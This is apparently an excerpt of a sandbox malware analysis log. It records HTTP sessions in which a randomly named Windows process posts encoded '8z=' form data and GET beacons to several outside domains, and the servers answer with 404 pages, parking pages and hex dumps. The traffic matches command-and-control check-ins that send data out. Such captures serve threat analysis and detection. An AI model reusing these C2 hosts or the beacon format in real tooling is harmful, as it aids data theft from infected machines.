                                                                                          Referer: http://www.zriaraem-skiry.sbs/f8c6/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 223
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Nov 24, 2024 08:22:34.379933119 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                          Date: Sun, 24 Nov 2024 07:22:34 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Vary: Accept-Encoding
                                                                                          Last-Modified: Thu, 29 Aug 2024 10:57:57 GMT
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sV5gaq%2BEQPf97UTDiHs%2BuWvJLQOCFCfTSHiB%2FLGkH4BIIaNZFpdoABY8yZ7XRd28BZw33w3gKfJUk3k9fa7tJKC1eC8nEYniMgi7fiV0b%2FaWZKVn5S98ueYX%2F63wMvyhBlxQLAyMvmfg"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8e77a60a9a7fde98-EWR
                                                                                          Content-Encoding: gzip
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1423&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=758&delivery_rate=0&cwnd=204&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Nov 24, 2024 08:22:34.379996061 CET | 326 | IN
                                                                                          Nov 24, 2024 08:22:34.380616903 CET | 21 | IN


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          39 | 192.168.2.5 | 50015 | 172.67.159.61 | 80 | 2020 | C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Nov 24, 2024 08:22:35.696445942 CET | 1775 | OUT | POST /f8c6/ HTTP/1.1
                                                                                          Host: www.zriaraem-skiry.sbs
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.zriaraem-skiry.sbs
                                                                                          Referer: http://www.zriaraem-skiry.sbs/f8c6/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 1239
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Nov 24, 2024 08:22:37.059489965 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                          Date: Sun, 24 Nov 2024 07:22:36 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Vary: Accept-Encoding
                                                                                          Last-Modified: Thu, 29 Aug 2024 10:57:57 GMT
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fRvagLVKRbBUBB3xsgc3XdVg%2BtRzWfjkVXdCfefBuTCXNPaaSybvddwehSm1BQ4HmzvL4qL%2FW%2Bnbc3PBS2l%2BRX0EBN9f0Uf%2BQpfAvvZLKVqg7MAulquslSCEvJWoYNEIif0l2egXTA6f"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8e77a61b4fe1c35f-EWR
                                                                                          Content-Encoding: gzip
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1489&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1775&delivery_rate=0&cwnd=172&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Nov 24, 2024 08:22:37.059573889 CET | 348 | IN


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          40 | 192.168.2.5 | 50016 | 172.67.159.61 | 80 | 2020 | C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Nov 24, 2024 08:22:38.354875088 CET | 478 | OUT | GET /f8c6/?afwXa=6nnHQlkprRILE&8z=qZLxeIvUMpnHejM96/T0f6H04zmKlOMWVFIDlZeaKgP5Xe4TtN4Ku6PXk96ANpScY+aAYV4Nd0GQ4lG6LSWgjSD2yKENm9C4V9rKFkDKUP4Cqcdi4mEHWGKUWB9ccnENVw== HTTP/1.1
                                                                                          Host: www.zriaraem-skiry.sbs
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Nov 24, 2024 08:22:39.734849930 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                          Date: Sun, 24 Nov 2024 07:22:39 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Vary: Accept-Encoding
                                                                                          Last-Modified: Thu, 29 Aug 2024 10:57:57 GMT
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xuEpzTEQwiEr9pCWHOAt6GEHC9QJ3PfNEfQcCKUogiXO3by%2B0Ue1yGs%2BPFKOdKGAEfed9Tnr%2FfKX0aRpUsVL4ZHtBVwgB9IJcxhAISxFprFs7WwPa79wrIEECpP3U2bFPmH4N%2B1P71N4"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8e77a62bfc4741cd-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2393&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=478&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Ascii: 57d<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 &mdash; Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="Sorry, page not found"/> <style type="text/css"> body {font-siz
                                                                                          Nov 24, 2024 08:22:39.734920025 CET | 1001 | IN
                                                                                          Data Ascii: e:14px; color:#777777; font-family:arial; text-align:center;} h1 {font-size:180px; color:#99A7AF; margin: 70px 0 0 0;} h2 {color: #DE6C5D; font-family: arial; font-size: 20px; font-weight: bold; letter-spacing: -1px; margin: -3


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          41 | 192.168.2.5 | 50017 | 172.67.168.228 | 80 | 2020 | C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Nov 24, 2024 08:22:45.313941002 CET | 717 | OUT | POST /gb2h/ HTTP/1.1
                                                                                          Host: www.nmgzjwh.net
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.nmgzjwh.net
                                                                                          Referer: http://www.nmgzjwh.net/gb2h/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 203
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Nov 24, 2024 08:22:46.898960114 CET | 889 | IN | HTTP/1.1 404 Not Found
                                                                                          Date: Sun, 24 Nov 2024 07:22:46 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oiIxfgFWAwX3ZP%2Fny6yOkgCNB2rlO6IOkkuDY%2FWx6KqbuvsoweO%2BmGQyk5sHLptlMeumM48tz04SQyZYsTePMBYFvtX6pWp5jRfYbRgsVbnSM7SwYR4ZKR12nN7v%2FEj3pU4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8e77a656edcfc338-EWR
                                                                                          Content-Encoding: gzip
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1458&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=717&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          42 | 192.168.2.5 | 50018 | 172.67.168.228 | 80 | 2020 | C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Nov 24, 2024 08:22:47.976769924 CET | 737 | OUT | POST /gb2h/ HTTP/1.1
                                                                                          Host: www.nmgzjwh.net
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.nmgzjwh.net
                                                                                          Referer: http://www.nmgzjwh.net/gb2h/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 223
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Nov 24, 2024 08:22:49.593923092 CET | 889 | IN | HTTP/1.1 404 Not Found
                                                                                          Date: Sun, 24 Nov 2024 07:22:49 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6%2BspKrhslZnvbJLaC9693y03YuXnmMnzuPJ1OUa4vMa%2FBJw7a%2FO58PMCNRpnVk055CeTUgOvC4IB9uUh6E6MXBjxCGTOnMIl7ffbnqUc3EJm5tkrr3%2F9IAA5dcvllGwA5yw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8e77a667cae243b2-EWR
                                                                                          Content-Encoding: gzip
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2236&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=737&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.5 | 50019 | 172.67.168.228 | 80 | 2020 | C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
Timestamp | Bytes transferred | Direction | Data
Nov 24, 2024 08:22:50.642451048 CET | 1754 | OUT | POST /gb2h/ HTTP/1.1
                                                                                          Host: www.nmgzjwh.net
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.nmgzjwh.net
                                                                                          Referer: http://www.nmgzjwh.net/gb2h/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 1239
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.5 | 50020 | 172.67.168.228 | 80 | 2020 | C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
Timestamp | Bytes transferred | Direction | Data
Nov 24, 2024 08:22:53.293205976 CET | 471 | OUT | GET /gb2h/?8z=EASy0dFQ3+mIcpYg1BhqvEqrUNk9skL9wz6GDDYkBoOZntt4ETpAdTcmLSDA/l8Pq56TjzGqLUU3SQIDrjgXIr49oxoJg0asAGStZmb1Pixrpd6NwrYyT6qlasg7QhQxcA==&afwXa=6nnHQlkprRILE HTTP/1.1
                                                                                          Host: www.nmgzjwh.net
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
Nov 24, 2024 08:22:54.924420118 CET | 890 | IN | HTTP/1.1 404 Not Found
                                                                                          Date: Sun, 24 Nov 2024 07:22:54 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gjuuwbQWjW%2BOROeAWS0JYmJA8HgYGxlrySVbvOzI%2FuFj7peIu1U1LlBO6fAaEhQyxmCUxA866Yl2Wdmvbmpb5qq8vV5Sngfl6FVY26khjkVILYdOy7ETYl6cttQ92R9QV9c%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8e77a6890b221921-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1424&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=471&delivery_rate=0&cwnd=144&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Ascii: 8a<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.5 | 50021 | 194.58.112.174 | 80 | 2020 | C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
Timestamp | Bytes transferred | Direction | Data
Nov 24, 2024 08:23:00.417012930 CET | 729 | OUT | POST /gdvz/ HTTP/1.1
                                                                                          Host: www.sklad-iq.online
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.sklad-iq.online
                                                                                          Referer: http://www.sklad-iq.online/gdvz/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 203
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Ascii: 8z=10AjTt63EifBze9QEOL/8EPp6IYnfnlYZjwqdjyu4pOL1gk6Cpr2cs88t1QYYwnJwlxHvEZIQY5cSgqwMfC5ZDtnu4ipAorHh0KdprMLB4Okk51JbyAx9olq4jkgmI3uo1oCOyj+Lbyt+q7pYXWhCx/suvBlkI4rDlHxPBHxVcGbiYWdu/wYEZo5L8QB4ECIv75+5ms=
Nov 24, 2024 08:23:01.801975965 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Sun, 24 Nov 2024 07:23:01 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Content-Encoding: gzip
Nov 24, 2024 08:23:01.801986933 CET | 224 | IN
Nov 24, 2024 08:23:01.830919027 CET | 1236 | IN
Nov 24, 2024 08:23:01.830929995 CET | 845 | IN


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.5 | 50022 | 194.58.112.174 | 80 | 2020 | C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
Timestamp | Bytes transferred | Direction | Data
Nov 24, 2024 08:23:03.084314108 CET | 749 | OUT | POST /gdvz/ HTTP/1.1
                                                                                          Host: www.sklad-iq.online
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.sklad-iq.online
                                                                                          Referer: http://www.sklad-iq.online/gdvz/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 223
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Ascii: 8z=10AjTt63EifB1PNQBpf/6kP2woYnKXlcZj8qdmSA5a6L1FY6Dor2fs88nVQXFAnSwltlvFlIQY9cShawQ864YTtl7IirPIrHh0KdprpQB5qklJlJaWUy0Ilt/jkgwI3io1owOzPYLZ6t+vHpYFuiNx/qjPARnbVlN3XETjCqVfOjjun30d4wX5EBbvY2p0jh1YpOnx7MObavuxDDQHTqzlRtlLJh
Nov 24, 2024 08:23:04.439945936 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Sun, 24 Nov 2024 07:23:04 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Content-Encoding: gzip
Nov 24, 2024 08:23:04.440076113 CET | 1236 | IN
Nov 24, 2024 08:23:04.440087080 CET | 1069 | IN


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.5 | 50023 | 194.58.112.174 | 80 | 2020 | C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
Timestamp | Bytes transferred | Direction | Data
Nov 24, 2024 08:23:05.765959978 CET | 1766 | OUT | POST /gdvz/ HTTP/1.1
                                                                                          Host: www.sklad-iq.online
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.sklad-iq.online
                                                                                          Referer: http://www.sklad-iq.online/gdvz/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 1239
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
Nov 24, 2024 08:23:07.116357088 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Sun, 24 Nov 2024 07:23:06 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Content-Encoding: gzip
Nov 24, 2024 08:23:07.116419077 CET | 1236 | IN
Nov 24, 2024 08:23:07.116457939 CET | 1069 | IN


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.5 | 50024 | 194.58.112.174 | 80 | 2020 | C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
Timestamp | Bytes transferred | Direction | Data
Nov 24, 2024 08:23:08.418742895 CET | 475 | OUT | GET /gdvz/?8z=42oDQZKHBS2RpvFMBZ7EzkD144AzeGctXRowK0Gqt433jWsXILGJddh+nwwRXUDcpHF9qTVEG6VDXm2WV9OiTRVapNS+KsXc4QK7u4kHLuXU5OsjWi1vwOB1/wMg5LW4+w==&afwXa=6nnHQlkprRILE HTTP/1.1
                                                                                          Host: www.sklad-iq.online
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
Nov 24, 2024 08:23:09.783698082 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Sun, 24 Nov 2024 07:23:09 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Data Ascii: 24f3<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.sklad-iq.online</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/*<![CDATA[*/window.trackScriptLoad = function(){};/*...*/</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text"> &nbsp;<a class="b-link" href="https://reg.r [TRUNCATED]
                                                                                          Nov 24, 2024 08:23:09.783721924 CET1236INData Raw: 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 20 62 2d 70 61 67 65 5f 5f
                                                                                          Data Ascii: ><div class="b-page__content-wrapper b-page__content-wrapper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.sklad-iq.online</h1><p class="b-parking__head
                                                                                          Nov 24, 2024 08:23:09.783732891 CET448INData Raw: d0 b5 20 d1 83 d1 81 d0 bb d1 83 d0 b3 d0 b8 20 d0 a0 d0 b5 d0 b3 2e d1 80 d1 83 3c 2f 68 32 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e
                                                                                          Data Ascii: .</h2><div class="b-parking__promo"><div class="b-parking__promo-item b-parking__promo-item_type_hosting-overall"><div class="b-parking__promo-header"><span class="b-parking__promo-image b-parking__promo-image_type_ho
                                                                                          Nov 24, 2024 08:23:09.784446955 CET1236INData Raw: 26 6e 62 73 70 3b d0 b1 d1 8b d1 81 d1 82 d1 80 d1 8b d0 b9 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 66 65 61 74 75 72 65 73 22 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 62 2d 70
                                                                                          Data Ascii: &nbsp;</p></div></div><ul class="b-parking__features"><li class="b-parking__features-item"><strong class="b-title b-parking__features-title"></strong><p class="b-text">&nbsp;
                                                                                          Nov 24, 2024 08:23:09.784508944 CET1236INData Raw: 6e 74 22 3e 38 33 26 6e 62 73 70 3b 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 68 61 72 2d 72 6f 75 62 6c 65 2d 6e 61 74 69 76 65 22 3e 26 23 38 33 38 31 3b 3c 2f 73 70 61 6e 3e 20 3c 2f 62 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 2d 6d 61 72
                                                                                          Data Ascii: nt">83&nbsp;<span class="char-rouble-native">&#8381;</span> </b><span class="l-margin_left-small">&nbsp;</span></p></div></div><div class="b-parking__promo-item b-parking__promo-item_type_hosting"><strong class="b-title b-title_siz
                                                                                          Nov 24, 2024 08:23:09.784518003 CET1236INData Raw: 62 2d 62 75 74 74 6f 6e 5f 63 6f 6c 6f 72 5f 72 65 66 65 72 65 6e 63 65 20 62 2d 62 75 74 74 6f 6e 5f 73 74 79 6c 65 5f 62 6c 6f 63 6b 20 62 2d 62 75 74 74 6f 6e 5f 73 69 7a 65 5f 6d 65 64 69 75 6d 2d 63 6f 6d 70 61 63 74 20 62 2d 62 75 74 74 6f
                                                                                          Data Ascii: b-button_color_reference b-button_style_block b-button_size_medium-compact b-button_text-size_normal" href="https://www.reg.ru/sozdanie-saita/"></a></div><div class="b-parking__promo-item b-parking__ssl-protection"><span class=
                                                                                          Nov 24, 2024 08:23:09.784672976 CET1236INData Raw: d1 82 20 d1 81 d0 b0 d0 b9 d1 82 d0 b0 20 d1 81 d1 80 d0 b5 d0 b4 d0 b8 20 d0 bf d0 be d1 81 d0 b5 d1 82 d0 b8 d1 82 d0 b5 d0 bb d0 b5 d0 b9 20 d0 b8 26 6e 62 73 70 3b d0 ba d0 bb d0 b8 d0 b5 d0 bd d1 82 d0 be d0 b2 20 d0 b8 26 6e 62 73 70 3b d1
                                                                                          Data Ascii: &nbsp; &nbsp; SEO-.</p></div></div></article><script onload="window.trackScriptLoad('parking-rdap-auto.js')" onerror="window.trackSc
                                                                                          Nov 24, 2024 08:23:09.784681082 CET1236INData Raw: 61 73 79 6e 63 20 3d 20 31 3b 0a 20 20 20 20 20 20 20 20 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 20 73 63 72 69 70 74 20 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 69 66 20 28 20 27 77 77 77 2e 73 6b 6c 61 64 2d 69 71 2e
                                                                                          Data Ascii: async = 1; head.appendChild( script );</script><script>if ( 'www.sklad-iq.online'.match( /xn--/ ) && document.querySelectorAll ) { var spans = document.querySelectorAll( 'span.puny, span.no-puny' ), t = 'textContent
                                                                                          Nov 24, 2024 08:23:09.784688950 CET522INData Raw: 20 7b 20 72 65 74 75 72 6e 3b 20 7d 7d 0a 20 20 20 6b 3d 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 74 29 2c 61 3d 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 74 29 5b 30 5d 2c 6b 2e 61 73 79 6e 63 3d 31 2c 6b 2e 73
                                                                                          Data Ascii: { return; }} k=e.createElement(t),a=e.getElementsByTagName(t)[0],k.async=1,k.src=r,a.parentNode.insertBefore(k,a)}) (window, document, "script", "https://mc.yandex.ru/metrika/tag.js", "ym"); ym(98466329, "init", { clickmap:tru


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          49 | 192.168.2.5 | 50025 | 172.67.220.36 | 80 | 2020 | C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Nov 24, 2024 08:23:15.091051102 CET | 741 | OUT | POST /x1zr/ HTTP/1.1
                                                                                          Host: www.supernutra01.online
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.supernutra01.online
                                                                                          Referer: http://www.supernutra01.online/x1zr/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 203
